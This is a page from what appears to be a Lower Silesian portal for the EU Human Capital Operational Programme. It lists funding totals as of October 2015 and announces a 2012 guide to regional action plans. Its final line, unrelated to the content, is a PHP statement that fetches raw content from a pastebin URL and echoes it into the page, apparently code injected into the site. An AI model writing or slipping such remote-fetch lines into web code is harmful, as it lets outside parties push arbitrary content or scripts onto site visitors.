Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

26.01.2012

Poradnik „Plany działania – czyli jakie projekty można realizować na Dolnym Śląsku”

Plan działania jest dokumentem precyzującym zapisy Szczegółowego Opisu Priorytetów Programu Operacyjnego Kapitał Ludzki (SzOP). Dla instytucji zaangażowanych we wdrażanie PO KL pełni on funkcję planistyczno-operacyjną, natomiast dla potencjalnych projektodawców – informacyjną. ma na celu przedstawienie w ujęciu rocznym założeń Instytucji Pośredniczącej PO KL, dotyczących m.in. preferowanych form wsparcia (typów projektów, jakie mogą być realizowane w ramach poszczególnych Działań/Poddziałań), zasad i terminów wyboru projektów, a także podziału środków finansowych przeznaczonych na realizację projektów systemowych i konkursowych.

Poradnik „Plany Działania – czyli jakie projekty można realizować na Dolnym Śląsku”

echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");